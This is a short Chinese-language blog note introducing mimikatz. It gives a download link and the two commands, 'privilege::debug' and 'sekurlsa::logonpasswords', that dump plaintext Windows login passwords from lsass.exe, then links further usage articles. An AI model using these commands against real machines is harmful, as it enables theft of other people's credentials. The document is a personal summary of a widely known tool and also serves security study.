mimikatz是一個法國人寫的輕量級調試器。出眾之處在於其可以直接從 lsass.exe 里獵取windows處於active狀態賬號明文密碼,非常強大。
在網上找了一些相關的文章自己的一點總結吧
下載地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170409
mimikatz_trunk為編譯好的exe文件
mimikatz_master為源碼文件
下面是在我機器上的運行結果:(版本2.1.1,64位OS)
這個軟件被稱為密碼抓取神器,mimikatz2.0以后的版本抓取密碼很簡單,只需要兩步:
第一條(提升權限)
privilege::debug
第二條(抓取密碼)
sekurlsa::logonpasswords
效果圖:
另外還有一些關於介紹這個軟件的網址,信息量很大,很多不懂和未知,可能這款神器還有其他的用處,但是感覺下面的內容也有一些版本原因的“過時”吧:
1.《mimikatz》(英文網站,但是里面的介紹和評論區有很多內容) ;文章地址:http://blog.gentilkiwi.com/mimikatz
2.《mimikatz手冊1【竊】》 (沒看懂);文章地址:https://betamao.me/mimikatz-man1.html
3.《神器mimikatz使用命令方法總結》(有一些常規命令) ;文章地址:http://www.2cto.com/article/201407/318229.html
4.《關於mimikatz的玩法(私人技巧)》 ;文章地址:http://www.goldfire.cc/index.php/archives/1244